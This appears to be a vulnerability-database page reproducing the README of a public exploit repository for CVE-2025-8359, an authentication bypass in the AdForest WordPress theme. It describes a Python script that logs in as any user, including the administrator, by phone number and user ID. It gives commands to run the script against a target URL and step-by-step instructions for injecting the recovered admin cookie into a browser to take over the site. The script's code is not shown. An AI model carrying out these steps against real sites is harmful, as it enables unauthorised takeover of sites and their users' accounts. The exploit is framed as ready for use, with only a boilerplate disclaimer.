来源

关联漏洞

描述

AdForest <= 6.0.9 - Authentication Bypass to Admin

介绍

# CVE-2025-8359
AdForest <= 6.0.9 - Authentication Bypass to Admin
# 🚨 AdForest <= 6.0.9 - Authentication Bypass to Admin

## 📦 Repository

> **Repo:** [Nxploited/CVE-2025-8359](https://github.com/Nxploited/CVE-2025-8359)  
> **Exploit Script:** `CVE-2025-8359.py`

---

## 📋 Description

> **CVE:** CVE-2025-8359  
> **Vulnerability Type:** Authentication Bypass  
> **Affected Product:** [AdForest - Classified Ads WordPress Theme](https://themeforest.net/item/adforest-classified-ads-wordpress-theme/19481695)  
> **Affected Versions:** Up to and including 6.0.9  
> **CVSS Score:** **9.8 (Critical)**

The AdForest theme for WordPress is vulnerable to an **Authentication Bypass** flaw in all versions up to 6.0.9.  
Due to improper validation of user identity during authentication, an unauthenticated attacker can log in as **any user**, including administrators—without needing a password. This allows full compromise of WordPress sites using AdForest.

---

## 🛠️ Script Overview

This repository contains a professional Python exploit script: `CVE-2025-8359.py`  
The script automates exploitation, intelligently testing all possible phone number formats to maximize success.  
It can authenticate as any user (including admin) and recover valid WordPress login cookies for hijacking sessions.

**Key Features:**
- Multi-variant phone format testing (`+`, spaces, encoding, etc).
- Auto-detection of user ID from server response.
- Robust session and error handling.
- Clear output with admin cookie extraction.

---

## 🚀 Usage

1. **Clone the repository:**
   ```bash
   git clone https://github.com/Nxploited/CVE-2025-8359.git
   cd CVE-2025-8359
   ```

2. **Install dependencies:**
   ```bash
   pip install requests
   ```

3. **Run the exploit script:**
   ```bash
   python CVE-2025-8359.py -u "http://target.com/wordpress" -p "+966 555 555 555" -i 1
   ```
   - `-u` : Base URL of WordPress installation.
   - `-p` : Target user's phone number (as stored in DB).
   - `-i` : Target user ID (e.g., `1` for admin).
   - `-n` : Name value (optional, default "test").

4. **Show script help:**
   ```bash
   python CVE-2025-8359.py -h
   ```

---

## 📦 Requirements

- Python 3.7+
- [`requests`](https://pypi.org/project/requests/)  
  Install via: `pip install requests`

---

## 🧾 Valid Output

- **If exploitation is successful:**
  ```
  [+] Logged in! Cookie: wordpress_logged_in_xxxxxx=xxxxxxx
  ```
  You have a valid WordPress authentication cookie for the target user.

- **If all formats fail:**
  ```
  [-] All variants failed. Try other phone formats or check the database.
  ```

---

## 🍪 Cookie Usage

Once exploitation is successful, the script prints the recovered authentication cookie.

**How to use the cookie:**
- Copy the `wordpress_logged_in_...` value.
- Inject the cookie into your browser session (using a browser extension, or DevTools).
- Visit `/wp-admin/` on the target site. If the exploit succeeded, you will have admin access.

**Example (with Chrome extension):**
1. Install "EditThisCookie" or similar.
2. Add the cookie for your target site:
   - Name: `wordpress_logged_in_xxxxxx`
   - Value: `xxxxxxx` (as printed by the script)
3. Refresh the page for admin access.

---

## ⚠️ Disclaimer

This project and exploit are for **educational and authorized penetration testing purposes only**.  
The author is **not responsible** for any misuse or damage caused by this exploit.  
Always obtain proper permission before testing any systems.

---

## ✨ By: _**Nxploited ( Khaled Alenazi )**_

文件快照

 [4.0K]  /data/pocs/1bf582defe52ee2541277fd185e22d279588ccd7
├── [3.9K]  CVE-2025-8359.py
├── [1.5K]  LICENSE
├── [3.5K]  README.md
└── [  17]  requirements.txt

0 directories, 4 files

备注